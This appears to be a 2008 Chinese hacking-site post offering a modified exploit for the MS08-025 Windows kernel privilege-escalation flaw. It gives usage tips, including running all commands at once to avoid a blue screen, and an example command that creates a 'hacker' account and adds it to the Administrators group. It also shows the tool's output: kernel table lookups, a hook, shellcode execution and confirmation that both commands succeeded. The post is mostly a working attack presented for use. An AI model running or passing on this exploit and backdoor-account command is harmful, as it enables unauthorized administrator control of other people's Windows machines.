update(2008.5.9):姬良:“这个和网上的不同,这个不是用双引号括住命令,而是用参数-s”
来源:%5C
真正可用的MS08025。
为了多次运行,服务器蓝屏,请直接用一次运行所有的命令
比如:
MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”
Local Privilege Escalation Vulnerability Exploit(MS08025)
Modify by [F.S.T] For 姬良
Run paltform: Windows 2k,xp,2k3,vista
ImageName: /WINDOWS/system32/ntkrnlpa.exe
[*] Get KernelBase Success, ntoskrnl.exe base = 80800000
[*] Mapping ntoskrnl.exe … ok
[*] KeServiceDescriptorTable = 00A746E0
[*] Find KiServiceTable … ok!!!
[*] KiServiceTable == 8082C734
[*] Get ZwVdmControl Number … ok!
[*] ZwVdmControl Call Number: 0000010C
[*] HookAddress: 8082CB64
[*] Create execute environment … Ok!
[*] call shellcode … Done.
[*] Create New Process:cmd.exe /c net user hacker hacker /add & net localgroup a
dministrators hacker /add
C:/Documents and Settings/Administrator>命令成功完成。
命令成功完成。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论